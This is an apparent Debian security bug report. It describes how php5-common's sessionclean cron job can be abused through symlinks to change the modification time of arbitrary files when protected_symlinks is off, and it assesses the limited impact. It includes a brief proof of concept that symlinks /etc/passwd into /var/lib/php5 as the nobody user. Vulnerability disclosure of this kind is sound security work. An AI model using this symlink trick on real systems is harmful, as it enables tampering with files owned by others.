Package: php5-common Version: 5.4.4-14+deb7u14 Tags: security /usr/lib/php5/sessionclean from [1] enables any process allowed to create entries in /var/lib/php5 to adjust the modification time of any file by waiting for the /etc/cron.d/php5 session cleanup job to run. This requires /proc/sys/fs/protected_symlinks to be set to 0 (off), which is not the default in Debian 7 Wheezy and up according to information from Debian security team.
Even for affected systems, the impact might be small, just annoying:
* backup/IDS might be unhappy when file modification time is changed every
30min
* some spoolers might work differently since stale file could be prevented
from reaching required age for next action
* some privileged /proc or /sys entries might not handle modification time
update correctly or react in a strange way
* Sudo credentials cache might be affected (not checked)
To my judgement, the session cleanup code does _NOT_ allow to create
arbitrary files ("touch -c" is used), hence it would not be possible to use
this to create e.g. /etc/suid-debug
POC:
su -s /bin/bash nobody
cd /var/lib/php5
ln -s /etc/passwd xxx
cat > "xxx yyy"
# wait
[1]
http://http.us.debian.org/debian/pool/main/p/php5/php5-common_5.4.4-14+deb7u
14_i386.deb
smime.p7s
Description: S/MIME cryptographic signature
